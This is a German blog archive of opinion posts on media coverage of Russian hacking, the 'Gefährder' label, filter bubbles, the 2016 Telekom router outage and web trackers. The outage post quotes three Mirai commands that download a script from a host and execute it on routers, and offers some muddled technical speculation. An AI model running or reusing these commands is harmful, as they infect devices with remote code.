Archiv der Kategorie: Politik

ForceNews: Die Logik des zerzausten Äffchens

Share Button

Als Falschmeldungen kann man die Berichte über russische Hackerangriffe, welche Wahlen in demokratischen Staaten manipulieren würden und wollten, nicht wirklich klassifizieren. Allerdings anstatt sie als FakeNews zu bezeichnen, würde der Anglizismus „ForceNews“ eher zutreffen. Diese Nachrichten sind nämlich keinesfalls falsch oder erfunden, aber in geballter Form werden Spekulationen wie Tatsachen behandelt, wobei die tatsächlich vorhandenen Fakten in vorgegebene Richtungen getrieben werden. Denn wenn man die Medienberichte zu den angeblichen Hackerangriffen, die die US- Wahl beeinflusst haben sollen, genauer betrachtet, sind eklatante Defizite in der tatsächlich vorhandenen Faktenbasis zu erkennen.

Russlands Präsident Wladimir Putin hat nach Einschätzung der amerikanischen Geheimdienste persönlich Cyber-Angriffe angeordnet, um die Wahlchancen des Republikaners Donald Trump zu erhöhen. Es könne „mit großer Sicherheit“ davon ausgegangen werden, dass Putin selbst hinter der Kampagne zur Beeinflussung der Wahl in Amerika stehe, hieß es in einem Bericht von CIA, FBI und NSA.

Quelle: FAZ

Der russische Präsident Wladimir Putin hat nach Einschätzung der US-Geheimdienste eine Kampagne angeordnet, um den Ausgang der amerikanischen Präsidentschaftswahl zu beeinflussen. Russland habe das Ziel verfolgt, die demokratische Kandidatin Hillary Clinton zu verunglimpfen und ihre Chancen auf einen Wahlsieg zu schmälern, heißt es in einem Bericht von NSA, FBI und CIA, der am Freitag veröffentlicht wurde.

Quelle: Zeit Online

Bemerkenswert übereinstimmend selbst in der Wortwahl sind die Berichte zu diesem Thema in fast allen Leitmedien. Beweise gibt es allerdings keine. Weil eben die Cyber- Angriffe im Code der Schadsoftware kyrillische Zeichen vorweisen, laut Meta- Daten die Herkunft auf russische Server verweist und die Struktur das Muster eines russischen Hackerkollektivs namens APT28 andeutet, wird unisono diese Annahme als nahezu erwiesen dargestellt.

Filtert man den erheblichen Anteil an Sensationsgeilheit und den voreilenden Gehorsam gegenüber amerikanischen Sicherheitsinstitutionen heraus, bleiben ernüchternde Sachverhalte übrig.

War nicht Hillary Clinton maßgeblich selbst dafür verantwortlich, dass sie leichtfertig in einer solch sensiblen Position dienstlichen Emailverkehr über private Mailserver absolvierte?

Wieso legen die amerikanischen Geheimdienste nicht jene Beweise vor, die angeblich den manipulativen Einfluss Russlands auf die US- Innenpolitik offenbaren?

Ganz bestimmt ist Wladimir Putin kein unschuldiger Chorknabe und nachweislich kein vorbildlicher Demokrat. Jedoch die Doktrin vom bösen Russen, der hinterhältig den kalten Krieg schleichend neu beleben will, wirkt geradezu verzweifelt, indem man eigene Fehler vertuschen möchte.

Es lohnt sich an dieser Stelle die Gedanken etwas in die jüngere Vergangenheit schweifen zu lassen, als ein gewisser Edward Snowden die Machenschaften der NSA und weiterer westlicher Geheimdiente aufdeckte und übrigens hierfür sogar unwiderlegbare Beweise vorlegen konnte.

Selbst das Abhören des Mobiltelefons von Bundeskanzlerin Merkel, was lediglich die Spitze des Eisbergs allumfassender Cyber- Spionage darstellte, konnte die Bundesregierung so aus der Fassung bringen wie die jetzt angenommene Bedrohung der Bundestagswahl 2017 durch russische Hackerangriffe. Der SPD- Fraktionsvorsitzende Thomas Oppermann äußerte sich vorbeugend panisch:

Gezielte Propaganda und Hackerangriffe aus dem Ausland werden eine große Herausforderung für den deutschen Wahlkampf sein.

Quelle: Focus Online

In IT- Fachkreisen werden solche spektakulären Horrorszenarien aus der virtuellen Welt deutlich entspannter betrachtet. Wie bereits beim mutmaßlichen Cyber- Angriff auf die Netzinfrastruktur (Parlakom)  des deutschen Bundestags hervorging, handelte es sich um Emailanhänge, die eine Malware beinhalteten. Solche verseuchten Emails erhalten täglich Millionen Internetnutzer. Zwar waren diese gefälschten Emails gezielt an Parlamentarier adressiert, aber simple Sicherheitskonzepte hätten diese recht banale Form einer Cyber- Attacke völlig belanglos werden lassen. Man könnte es auch mit einer Weisheit aus dem konventionellen Alltag umschreiben:

Wer im Regen steht und den Regenschirm nicht aufspannt, braucht sich nicht zu wundern, wenn man nass wird.

Nachrichten, welche also suggerieren, dass gewisse Umstände entsprechende Ereignisse hervorrufen könnten und diese Nachrichten massiv mit Spekulationen angereichert werden, deren  Gesamtinformationsgehalt nur einen minimalen Faktenanteil besitzt, sind keine FakeNews, sondern ForceNews.

Es existieren also einigermaßen schwammige Tatsachen zu einem Vorfall, worum eine Geschichte gebastelt wird, die mit den reinen Fakten kaum noch etwas zu tun hat. Ein hervorragendes Beispiel liefert der angebliche Cyber- Angriff auf die Telekom:

Auch bei der jüngsten Attacke auf die Telekom gibt es kaum Beweise. Aber es gibt zeitliche Zusammenhänge. Und die lassen den Schluss zu, dass solche Angriffe Teil der russischen Strategie sind.

Das war ein kleiner Warnschuss an Deutschland, nicht wahr? Ein digitaler Warnschuss ins Wohnzimmer, pünktlich zum ersten Advent, mit der Telekom als Boten. Eine kleine Aufmerksamkeit für all diejenigen, die den Internetangriff auf den Bundestag im September 2015, zwei Jahre vor der Bundestagswahl, nicht ernst genommen haben.

Quelle: Welt

Ziemlicher Unsinn ist das, was quasi alle Leitmedien damals zunächst über den Ausfall von ca. 900000 Internetroutern einiger Typen der Speedport- Reihe zu berichten hatten. Tatsächlich war es eine Nachlässigkeit der Telekom, die Geräte nicht ordnungsgemäß mit einem erforderlichen  Firmware- Update auszustatten. Es war ein üblicher, keineswegs zielgerichteter Angriff auf weltweit alle Geräte, die eine sogar lange bekannte Sicherheitslücke nicht geschlossen hatten. Die Routermodelle der Telekom waren eher zufällig betroffen. Dennoch wurde zunächst von staatlichen Institutionen und auch der Bundesregierung selbst die Mutmaßung über einen russischen Cyber- Angriff öffentlich kolportiert.
Sind solche Halbwahrheiten, welche bewusst oder auch unbewusst durch eigentlich als seriös geltende Medien verbreitet werden nun FakeNews? Oder sollte man nicht doch etwas mehr differenzieren?
Womöglich sind solche ForceNews noch gefährlicher als handfeste FakeNews, die als solche eindeutig widerlegt werden können.  Denn wie man erkennen kann, reden Politiker und Medien beim Telekom- Routerausfall sowie bei der Malware- Infektion von Bundestags- Computern immer noch von gezielten russischen Cyber- Angriffen…

 

 

Share Button

Wie gefährlich sind „Gefährder“

Share Button

Seit dem Terroranschlag auf einen Weihnachtsmarkt in Berlin kurz vor Weihnachten 2016, kursiert der Begriff „Gefährder“ durch die Medien und die sozialen Netze.

Nach dem Anschlag in Berlin haben Polizei und Verfassungsschutz auch in Hessen die Observation von islamistischen Gefährdern intensiviert.

Quelle: FAZ

In der Wikipedia wird der Begriff folgendermaßen erläutert:

Als Gefährder werden im Zusammenhang mit der öffentlichen Sicherheit und Gefahrenabwehr Personen bezeichnet, bei denen kein konkreter Hinweis vorliegt, dass sie eine Straftat planen, aber bei denen „bestimmte Tatsachen die Annahme der Polizeibehörden rechtfertigen, dass sie Straftaten von erheblicher Bedeutung, insbesondere solche im Sinne des § 100a der Strafprozessordnung (StPO), begehen“ werden. Die 2004 von der Arbeitsgemeinschaft der Leiter der Landeskriminalämter und des Bundeskriminalamts festgelegte Begriffsbestimmung ist nicht gesetzlich verankert.

Tatsächlich obliegt es demnach exekutiven Behörden, Menschen zu kategorisieren. Die Polizeibehörden der Länder in Zusammenarbeit mit den Landesämtern für Verfassungsschutz legen in Deutschland jeweils fest, wen sie als Gefährder einstufen. Es wird hierfür sogar beim BKA eine Liste geführt, die sogenannte „Datenbank Islamismus“ (DABIS). Etwa 550 Personen sollen derzeit auf dieser Liste (Stand 2016) stehen.

Wenn man nun die Pannenserie des Verfassungsschutzes bei den NSU- Morden betrachtet, darf man davon ausgehen, dass diese Liste weder vollständig sein kann, noch ist sicher zu behaupten, dass womöglich Leute ins Raster der Ermittler geraten sind, die eben keine Gefährder sind. Es ist eine willkürliche Zusammenstellung, freilich nach umfangreicher Abwägung.

In der TAZ wird der Begriff „Gefährder“ relativiert:

Eine offizielle Definition von „Gefährder“ gibt es nicht, der ehemalige Innenminister Hans-Peter Friedrich bezeichnete „Gefährder“ als „Personen, bei denen Tatsachen die Annahme rechtfertigen, dass sie erhebliche Straftaten begehen könnten“. Im juristischen Sinn hat der Begriff jedoch keinerlei Bedeutung, denn gegen einen „Gefährder“ liegen keine konkreten Hinweise vor, die für eine Anklage ausreichen. Es handelt sich also nicht einmal um Verdächtige, kurz gesagt: Es geht um Unschuldige. „Gefährder“ ist ein Neusprech-Neologismus von Innenministern, die gerne eines unserer wichtigsten rechtsstaatlichen Prinzipien unterhöhlen würden: Die Unschuldsvermutung. Der Begriff soll es möglich machen, Menschen, die nichts Strafbares getan haben, wie Kriminelle zu behandeln, und ist damit Teil einer sprachlichen Aufrüstung, die von Medienschaffenden nicht undifferenziert nachgeplappert werden sollte.

Der Begriff „Gefährder“ wird zu leichtfertig von Regierungsmitgliedern und auch Medienvertretern verwendet, ohne dass es dafür eine rechtliche Grundlage geben würde, Leute so zu bezeichnen. Es ist und bleibt eine Vermutung, wenngleich eine begründete. Durch die Verwendung des Begriffs wird allerdings suggeriert, dass die damit bezeichneten Personen Kriminelle oder gar Terroristen seien.

Bei Hunden gilt der Pitbull Terrier als gefährliche Hunderassen und ist in einer nicht einheitlichen Rasseliste der verschiedenen Bundesländer aufgelistet und darf nicht nach Deutschland eingeführt werden. So manchem Tier widerfährt Unrecht, hingegen wird pauschal Sicherheitsprophylaxe betrieben. So kann es auch auf Personen zutreffen, die in jener Gefährder- Liste aufgeführt werden, die sich ein Leben lang nichts zu Schulden haben kommen lassen und nicht einmal wissen, dass sie als Gefährder eingestuft sind.

Aber es gibt sogar Nachweise ausgerechnet vom Zentralrat der Muslime in Deutschland, dass man den deutschen Rechtsstaat offensichtlich nicht begriffen hat:

„Ich verstehe nicht, warum Menschen, die für den IS rekrutieren, nur beobachtet werden“, sagte Mazyek. Das gefährde „unsere Sicherheit“.

Quelle: FAZ

Sollte man die Errungenschaft der Unschuldsvermutung aufgeben und stattdessen wie in diktatorischen Strukturen, Leute, denen keine Schuld nachgewiesen werden kann, wegsperren? Es ist durchaus eine gesellschaftliche Belastungsprobe, als gefährlich anzusehende Personen Freiheit zu gestatten und sich darüber hinaus einer möglichen Gefahr auszusetzen. Müsste man nicht eher einen Ansatzpunkt finden, der die Gefahr minimiert oder im besten Fall ausschließt? Salafisten können sich auf eine weitere Errungenschaft einer freiheitlichen Gesellschaft berufen, die Meinungsfreiheit. Doch wenn selbst Autokennzeichen nicht speziell definierte Buchstaben- oder Zahlenkombinationen wie beispielsweise „SS“ tragen dürfen, klingt es beinahe grotesk, wenn extremistische Islamisten Menschen für radikale Ideologien begeistern und anwerben dürfen…

Share Button

Reise in die Filterblase

Share Button

Der Begriff „Filterblase“ könnte durchaus für eine Nominierung zum Unwort des Jahres avancieren. Gemeint ist damit sozusagen ein virtueller, ideologisch abgeschirmter Käfig, der maßgeblich durch (a)soziale Netze im Internet verfügbar gemacht wird. Die Möglichkeit, sich zum Beispiel als Facebook- Nutzer seine virtuelle Umgebung, abgesehen von den Werbeeinblendungen, nach eigenen Vorstellungen zu gestalten, birgt die Gefahr, sich gegen Informationsquellen, welche man durch Vorurteile bzw. durch die eigene Gesinnung missbilligt, abzuschotten. Da es in der menschlichen Natur liegt, eigene Vorlieben, Sichtweisen und Dogmen gegenüber anderen Ansichten vorzuziehen, fällt manchen Leuten der Blick über den Tellerrand schwer.

Die eigenen Idole müssen schon heftig viel Mist bauen, damit man wieder Bodenhaftung zurück erlangt, um halbwegs objektiv Sachverhalte einschätzen zu können. Wer hat nicht in Erwartung auf ein tolles Musikerlebnis, das Album seines Pop- Idols ungehört gekauft? Welcher Fan eines Fußballstars hat noch nicht unrühmliche Auftritte seines Idols abseits des Stadions entschuldigend relativiert? Hingegen neigt der Mensch dazu, jeden noch so kleinen Fehltritt von als Gegnern wahrgenommenen Leuten hoch zu stilisieren.

Der Weg in die eigene Filterblase gelingt schnell und man merkt es nicht einmal. Im politischen Geschehen scheinen die Folgen dieser Entwicklung längst Früchte zu tragen. Populismus erfährt eine fatale Renaissance.

filterblase1

Als Meister dieser Disziplin erweisen sich Politiker, die auf jede Situation eine einfache sowie mundgerechte Antwort wissen, wie die AFD- Politikerin Beatrix von Storch es stets mit spitzfindigen Twitter- Perlen praktiziert.

Obdachlose bekommen sehr wohl Obdach, wenn sie sich nur ansatzweise darum bemühen würden. Flüchtlinge müssen sich auch entsprechend registrieren lassen. Die Behörden sammeln nicht die Leute von der Straße, weder Flüchtlinge noch Obdachlose. Und es gibt durchaus Obdachlose, die Mobiltelefone besitzen. Die Aussagen von Frau von Storch sind schlichtweg falsch und befeuern lediglich Hass und Hetze von Leuten, die ohnehin sich Flüchtlinge als Feindbild ausgewählt haben. Auf konkrete Kausalzusammenhänge wird verzichtet.

filterblase2

Filterblasenbewohner des rechtspopulistischen Territoriums glauben in gehorsamer Naivität jeden Blödsinn. Dass Herr Elsässer postfaktischen Blödsinn erzählt, spielt keine Rolle. Gerne begibt man sich auch in die bemitleidenswerte Opferrolle. Das Linksextreme generell mit gleichen Strategien kämpfen, soll nicht verschwiegen werden.

filterblase3

Wie funktioniert nun die Propaganda in einer solchen Filterblase? Wer sich seine Filterblase zusammengebastelt hat, bekommt weitgehend Informationen aus diesen ausgewählten Quellen. Der Fall über angeblich katastrophale Zustände in Münchner Kliniken durch Migranten ist ein hervorragendes Beispiel für Meinungsmanipulation. Es existieren oft mehrere Quellen, die über den gleichen Vorfall berichteten, allerdings sich gegenseitig als Quellen angaben. Die Geschichte war erlogen, aber man wollte der Story einen seriösen Eindruck verschaffen, indem man auf einen tschechischen TV- Sender verwies. Tatsächlich gab es ein YouTube- Video dazu, aber der angebliche Sender findet man nicht in der offiziellen Senderliste der tschechischen Rundfunkanstalten. Es handelt sich um einen privaten YouTube- Kanal, der sich als Fernsehsender inszeniert. Nachfragen bei diversen Münchner Kliniken konnten bestätigen, dass der geschilderte Fall frei erfunden war und diese Ärztin nie dort gearbeitet hatte.

Nicht immer sind die Meldungen so offensichtlich falsch, manchmal besitzen sie sogar einen wahren Kern, der aber nach der eigenen Vorstellung passend zurecht gerückt wird. Das darf man übrigens auch anderen, als zuweilen seriös geltenden Medien vorwerfen. Auch diese verfolgen gelegentlich eine tendenziös wirkende Berichterstattung. So war es ziemlich auffällig, dass im US- Wahlkampf Donald Trump erheblich schlechtere Publicity aus der deutschen Presselandschaft bekam als Kontrahentin Hillary Clinton.  Es gibt eben nicht nur eine Filterblase…

 

 

Share Button

Cyberwar oder einfach nur technisches Versagen?

Share Button

OK, ich lehne mich mit meiner Ansicht über die massive Telekom- Störung vom 27. November 2016 ziemlich weit aus dem spekulativen Fenster. Bei dieser Störung handelt es sich um den Ausfall von etwa 900000 Internetanschlüssen von ausschließlich Telekom- Kunden.

Quelle: Telekom
Quelle: Telekom

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat sich zu einem gewagten Statement hinreißen lassen:

Das BSI ordnet diesen Ausfall einem weltweiten Angriff auf ausgewählte Fernverwaltungsports von DSL-Routern zu. Dieser erfolgte, um die angegriffenen Geräte mit Schadsoftware zu infizieren. Diese Angriffe wurden auch in dem vom BSI geschützten Regierungsnetz registriert, in dem sie aber auf Grund funktionierender Schutzmaßnahmen folgenlos blieben.

Ich glaube nicht, dass ein Hackerangriff für den Ausfall von Routermodellen ausschließlich des Typs Speedport und nur bei der Telekom verantwortlich ist/war.

Was spricht gegen diese Theorie, womit übrigens bereits kräftig politisch Kapital daraus geschlagen und gleichzeitig das technische Versagen der Telekom verschleiert wird?

1. Es existierte eine Störungsmeldung der Telekom bereits vor bzw. parallel zu der prominenteren, wo über 900000 Kunden betroffen sind/waren. Die Störmeldung lautet wörtlich:

„Automatische Routerkonfiguration funktioniert teilweise nicht“.

Quelle: Telekom
Quelle: Telekom

Es wurde also versucht, automatisch Änderungen an der Konfiguration vorzunehmen, wie das z.B. bei Firmware- Updates üblich ist, wenn der Kunde den Zugang hierfür auf seinem Router geöffnet hat. Das muss jetzt nichts mit der Folgestörung zu tun haben, wäre aber plausibel für den Fall, dass die neu eingespielte Firmware fehlerhaft gewesen sein sollte.

2. Angenommen, es wäre tatsächlich ein Cyber- Angriff auf jene Speedport- Routermodelle mit einer entsprechenden Sicherheitslücke der Grund für die massenhaften Ausfälle, wäre das aus Sicht der Angreifer doch eher sinnlos. Cyber- Kriminelle würden sich ja selbst das eigene Ziel für ihre Aktionen versperren, indem sie diese Internetanschlüsse quasi abschalten. Das ergibt eigentlich keinen Sinn.

3. Die von der Telekom eingeleiteten Maßnahmen zur Problemlösung in Form eines Konfigurationsupgrades deuten eher darauf hin, dass ein typischer Konfigurationsfehler behoben werden soll, als dass eine augenscheinlich bekannte Sicherheitslücke geschlossen werden soll. Würde nur eine Sicherheitslücke geschlossen werden, würde man damit nicht unbedingt auch wieder die Internetverbindung herstellen.

4. Schaut man sich die Kommentare diverser betroffener Telekom- Kunden an, so konnten viele das Problem lösen, indem sie ihre Endgeräte manuell auf einen anderen DNS- Server eingestellt haben (z.B. 8.8.8.8 von Google). Da diese Leute danach erfolgreich das Internet über den angeblich manipulierten Router und dessen womöglich fehlerhafter DNS- Konfiguration nutzen konnten, ist das ein erhebliches Indiz dafür, dass schlicht ein Konfigurationsfehler im Router zu bemängeln wäre. Das könnte z.B. spekulativ, aber plausibel darauf zurückzuführen sein, dass ein automatisches Router- Update fehl schlug und dabei eine falsche Adresse des Telekom- DNS- Servers eingetragen wurde. Dieser Lösungsansatz, der ja auch nachweislich bei vielen Leuten funktionierte, würde die Theorie eines Cyber- Angriffs deutlich schwächen.

5. In der Telekom- Störungsmeldung wird außerdem berichtet, dass man den Hersteller des Routers in die Fehlerbeseitigung involviert hat. Wären Modelle anderer Hersteller ebenfalls betroffen, hätte man nicht von einem Hersteller (im Singular) gesprochen, was man bei solchen Cyber- Angriffen durchaus erwarten müsste. Durch die bisher allerdings spärlich vorhandenen Informationen deutet alles eher darauf hin, dass die besagten Routermodelle womöglich lapidar durch ein automatisches Update lahm gelegt wurden. Die Zahl von etwa 900000 betroffenen Geräten deutet wiederum darauf hin, dass zwar viele Anschlüsse betroffen waren, aber lange nicht alle, die diese Routermodelle verwenden. Das kann eventuell damit zu erklären sein, dass eben nicht alle Router für ein automatisches Upgrade freigeschaltet waren/sind. Da müsste man jetzt Feedback von Telekom- Kunden bekommen, die mit den gleichen Routermodellen eben nicht vom Ausfall betroffen gewesen sind und ob tatsächlich die automatische Updatefunktion abgeschaltet ist. (Immerhin einen solchen Telekom- Kunden kenne ich persönlich.)

6. Befasst man sich mit der vom BSI propagierten Sicherheitslücke näher, klingt deren Schlussfolgerung keineswegs plausibel. Man sieht das TR-069 Protokoll, welches für Fernwartungszwecke für Kunden- Router eingesetzt wird, als potentielle Sicherheitslücke und auch im aktuellen Fall verantwortlich für die massenhaften Ausfälle. Die Kommunikation erfolgt über den Port 7547, was aber nicht zwingend sein muss.

Hierzu existiert ein offizielles Statement der Telekom auf eine entsprechende Kundenanfrage aus dem Jahr 2014, als die Sicherheitslücke des TR-069 Protokolls publiziert wurde:https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Offener-TCP-Port-7547-aus-dem-Internet/td-p/1092313/page/2

Quelle: https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Offener-TCP-Port-7547-aus-dem-Internet/td-p/1092313/page/2

 

Genau genommen müssten die Hacker demnach eher die Management- Server der entsprechenden Provider angreifen, um tatsächlich Zugriff auf betroffenen Router zu erlangen. Der Aufwand in Bezug auf den zu erwartenden Nutzen wäre gering.  Es ist nicht ungewöhnlich, dass im Internet Ports gescannt werden und der Port 7547 (TR-069 bzw. TR-064) bildet keine ungewöhnliche Ausnahme. Der Angreifer müsste sich nach dieser These einen Remote- Zugang auf einen schwach geschützten Kunden- Router verschaffen, um dann wiederum eine Kommunikation zum Provider- Management- Server herstellen zu können. Dann müsste der Angreifer schließlich noch die Sicherheitshürden des entsprechenden Management- Servers überwinden, um schließlich Zugriff auf alle Kunden- Router, die die Fernwartungsschnittstelle geöffnet haben, zugreifen zu können. Das wäre unter Umständen mit viel Aufwand und Glück möglich, würde aber absolut keinen Sinn ergeben, indem man nach diesem Aufwand einfach nur die Kunden- Router vom Netz trennt und damit auch den eigenen Zugriff darauf unterbindet.

7. Und schließlich wäre es allein aus Analysezwecken interessant und wichtig gewesen, an betroffenen Anschlüssen mal andere Routermodelle zu verwenden, ob dadurch der Fehler hätte behoben werden können. Darüber schweigt man sich aus, denn es würde nachweisen, dass der Cyber- Angriff erfunden wäre. Andere Routermodelle verwenden ebenfalls jene Fernwartungsschnittstelle. Wieso waren absolut keine anderen Router als jene Speedport- Modelle betroffen?

Wie dem auch sei, mir kommt als jemand, der sich ein wenig mit IT- Technik auskennt, diese Geschichte ziemlich suspekt vor.

Zwischenzeitlich verbreitet sich die Nachricht, dass tatsächlich eine schlecht programmierte Malware gezielt DSL- Router mit der inzwischen als verantwortlich erklärten Sicherheitslücke für die Ausfälle zuständig gewesen sein soll.

Würde sich nur ein einziger Telekom- Kunde melden, dessen Speedport- Router nicht jene Easy- Support Funktion eingeschaltet hatte und auch nicht betroffen gewesen wäre, würde die Telekom in Erklärungsnot geraten. Denn betroffene Telekom- Kunden, die durch Änderung des DNS- Server- Eintrages im Router das Problem selbst lösen konnten, mussten ja hingegen vom Zugriff von außen schließlich betroffen gewesen sein. Wenn also beide Fälle nachzuweisen wären, wäre die Cyber- Attacke als Erklärung recht dürftig.

Update 29.11.2016

 

telekom_stoerung4atelekom_stoerung4btelekom_stoerung4ctelekom_stoerung4d

 

 

 

 

 

 

 

 

Für den Fall, dass doch tatsächlich ein Hacker- Angriff der Auslöser für diese Großstörung der Telekom gewesen sein sollte, muss man der Telekom grobe Fahrlässigkeit unterstellen.

Wie erwähnt, hat man die Telekom bereits 2014 auf diese mögliche Schwachstelle hingewiesen. Jedoch hat die Telekom diesen Hinweis nicht ernst genommen bzw. sogar ignoriert. Es wurde versichert, dass nur der Telekom- Server Zugriff per „Easy Support“ herstellen könnte…

Ein Auszug aus dem Code des berüchtigten Mirai- Virus:

cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh

`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`

`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`

Grob gefasst, wird an das Gerät über einen Port, der nach außen, also in Richtung Internet, offen sein muss, eine entsprechende Anfrage gestellt. Das soll über den Port 7547 geschehen sein, der augenscheinlich für die Fernwartung von Seiten der Telekom für Speedport- Router standardmäßig geöffnet ist.

Das genügt jedoch nicht, um Befehle auszuführen. Hierfür muss natürlich vorher eine Authentifizierung erfolgen, ob die Remote- Anfrage auch berechtigt ist, Zugriff zu erhalten. Das scheint ja immerhin bei 900000 Routern der Telekom dann mit Erfolg praktiziert worden zu sein. Das Virus bedient sich dabei einem recht simplen Verfahren, indem es einfach der Reihe nach typische Standardpasswörter probiert. Danach können dann Befehle ausgeführt werden, die wie oben Daten nachladen, Berechtigungen von Dateien ändern usw.

Demnach wäre auch die Aussage auf die Frage im Jahr 2014 falsch, dass ausschließlich eine Verbindung zu einem Management- Server der Telekom über das TR-069 Protokoll möglich wäre.

Update 30.11.2016:

Die Anzeichen für einen Cyber- Angriff haben sich verdichtet. IT- Experten, allerdings nicht von der Telekom, haben den Angriff analysiert. Demnach war es kein gezielter Angriff durch russische Cyber- Soldaten, wie es zwischenzeitlich in den Medien propagiert wurde, sondern eben die übliche Prozedur von Internet- Kriminellen, welche Schwachstellen in der IoT- Umgebung (Internet of Things) permanent absuchen.

Die leider nicht geschlossenen Sicherheitslücken waren schließlich ausschlaggebend für das erfolgreiche Infizieren der Malware, welche wohl ein Derivat des berüchtigten Mirai- Virus war.

Die Speedport- Router waren auch nicht abgestürzt, sondern nur funktional eingeschränkt, da ja einige Telekom- Kunden durch das Ändern der DNS- Einträge auf den Endgeräten den Router immerhin noch als DSL- Modem verwenden konnten.

Die Aussagen von Seiten der Telekom bzw. des BSI, dass die Malware schlecht programmiert gewesen sein soll und dadurch nicht das eigentliche Ziel erreichte, sind falsch. Tatsächlich konnte die Malware nicht die Router- Software manipulieren, weil die Betriebssystem- Routinen nicht kompatibel mit der Programmiersprache (Linux) der Malware waren. Das deutet darauf hin, dass es definitiv kein gezielter Cyber- Angriff auf die Telekom- Infrastruktur gewesen sein kann.

Share Button

Nackt im Netz – Die Analyse zur NDR Sendung

Share Button

Der Panorama- Beitrag des NDR, Nackt im Netz, hat richtigerweise bei einigen Internetnutzern für  Sorgenfalten gesorgt. Dennoch denke ich, dass der Beitrag auch Defizite besitzt. Das möchte ich hiermit ergänzen:

Insbesondere haben die Autoren sich bei der Erhebung jener Daten auf Browser- Erweiterungen wie das erwähnte „WoT“ (Web of Trust) fixiert. Dabei sind es oft solche Browser- Erweiterungen, die den Schutz vor Ausspähung etwas minimieren können. Aufgrund einiger schwarzer Schafe unter den sogenannten AddOns halte ich es eher für kontraproduktiv, diese oft nützlichen Erweiterungen pauschal zu dämonisieren. Solche Programme wie „Ghostery“ erwirken durchaus eine höhere Privatsphäre. Die Browser selbst sind ebenfalls unterschiedlich geschwätzig und von Google’s Chrome ist definitiv abzuraten, wohingegen Mozilla Firefox oder dessen Modifikation Cliqz vorzuziehen wären.

Tatsächlich ist es gar nicht nötig, dass Browser- Erweiterungen für das Sammeln jener Daten eingesetzt werden, da der Anwender allein durch das Nutzen von Suchmaschinen wie Google diese Daten bereits ohne Zusatzprogramme aushändigt. Im Beitrag war das auch kurzzeitig zu sehen, wenn auch nicht explizit darauf eingegangen wurde. Der Browser selbst liefert diese Daten aus, was in manchen Fällen sogar unumgänglich für das Funktionieren zwischen Client (PC, Smartphone) und Server ist. Ein gewisses „Handshake“ zwischen den kommunizierenden technischen Systemen muss schlicht stattfinden. Man kann es aber auf ein Minimum reduzieren.

Indem man z.B. anstatt Google als Suchmaschine eine datenfreundliche Alternative wie „Startpage.com“ verwendet, reduziert man die Auslieferung von spezifischen Daten ungemein.

Ist man Nutzer von sozialen Netzwerken wie Facebook, sollte man sich jedes Mal nach der Nutzung richtig abmelden. Denn ansonsten kann Facebook aufgrund der bekannten Identität des Nutzers sogar Daten sammeln, wenn dieser sich anderswo in der virtuellen Welt bewegt. Man kann sich das so vorstellen, als würde man einen Hund an einen Baum mit einer quasi unendlich langen Leine anbinden. Wie ein GPS- Signal sendet das Gerät des Facebook- Benutzers, der sich nicht vom Dienst abgemeldet hat, den Standort und den Namen der jeweiligen Internetpräsenz an Facebook zurück.

Dass man, wo immer es möglich ist, nicht unbedingt seinen Klarnamen angeben und mit Auskünften über die eigene Person sparen sollte, wäre ebenfalls eine recht simple Möglichkeit, die eigenen Datenspuren zumindest teilweise zu verwischen. Verschlüsselung und Proxy- Nutzung runden ein schon ziemlich schlüssiges Sicherheitskonzept ab. Stichwort „Tor„.

Extrem wichtig ist auch das Unterbinden von sogenannten Trackern. Damit bezeichnet man kleine Code- Snippets, die in die Quellcodes von Internetseiten eingebaut werden. Sie dienen hauptsächlich dem Zweck, die Besucher sekundär zu analysieren und auszuwerten, indem alle möglichen Daten, die zwangsläufig zwischen Start- und Zielsystem ausgetauscht werden, primär gesammelt werden. Ich habe mir einmal die Mühe gemacht und habe einige „renommierte“ deutsche Internetpräsenzen danach untersucht, wie viele solcher Tracker dort ohne Einwilligung der Besucher deren Daten einsammeln (unvollständige Beispielliste):

trackerliste

 

Man könnte die Liste beliebig fortsetzen und in den meisten Fällen auch mehr oder weniger Tracker finden. Nun sind nicht alle Tracker gleichermaßen für die Privatsphäre gefährlich, dennoch wäre es die moralische Verpflichtung der Betreiber, mindestens die Besucher auf diese Datenerfassung hinzuweisen, natürlich bevor die Tracker aktiv werden. In der aktuellen Situation hat kein Anwender eine Chance, sich dagegen zu wehren, bestenfalls mit Anti- Tracker Programmen. Da klingt es beinahe schon schizophren, dass aktuell Branchen- Lobbyisten per Gesetz den Einsatz von sogenannten Ad- Blockern verbieten lassen wollen…

Der NDR setzt beispielsweise den Tracker „InfOnline“ ein, der das Besucheraufkommen messen soll. Es ist eine nutzbringende und strategische Information von Internetseitenbetreibern, bietet aber schon grundlegende Informationen zur Profilbildung. Der nächste Tracker „NetRatings SiteCensus“ besitzt schon eine andere Qualität. Auf der Internetpräsenz dieses Anbieters wird unverhohlen mit Marketing- Strategien aufgrund der gesammelten Daten geworben. Der 3. Tracker im Portfolio des NDR nennt sich „Digital Analytix“. Ich überlasse es jedem selbst, zu recherchieren, welche Daten die einzelnen Tracker sammeln und analysieren. Im Prinzip kann der NDR das sogar bequem im eigenen Haus tun, da ja der Sender als Kunde dieser Unternehmen das Ergebnis kostenpflichtig erhält. Für eine öffentlich- rechtliche Sendeanstalt halte ich das Tracken von Besuchern Ihrer Internetpräsenz durchaus für fragwürdig.

Da gibt es auch solche Tracker wie „Amazon Associates“, die z.B. dafür sorgen, dass die Internetnutzer auch die passende personalisierte Werbung erhalten und sich wundern, woher der Internetkonzern weiß, dass man tatsächlich nach diesen Dingen im Internet gesucht hat.

T- Online offenbart übrigens zusätzlich dubiose Geschäftspraktiken mit Tracking. Denn Kunden des Unternehmens sind schließlich gezwungen, über die Einstiegsseiten des Konzerns in ihren Online- Kundenbereich zu gelangen und werden somit ständig analysiert.  Netzpolitik.org bildet fast schon eine einsame und zugleich vorbildliche Ausnahme im Bereich der Nachrichtenportale und lässt seine Besucher in Ruhe.

Man darf aber nicht unerwähnt lassen, dass es auch Tracker gibt, die auch nützlich sind. Da wäre beispielsweise „Hupso“ zu erwähnen, der den Komfort bietet, dass Webinhalte schnell und einfach auf anderen Plattformen verbreitet werden können. Dabei werden natürlich auch Daten gesammelt, aber der Benutzer kann selbst entscheiden, ob er diesen Komfort nutzen möchte.

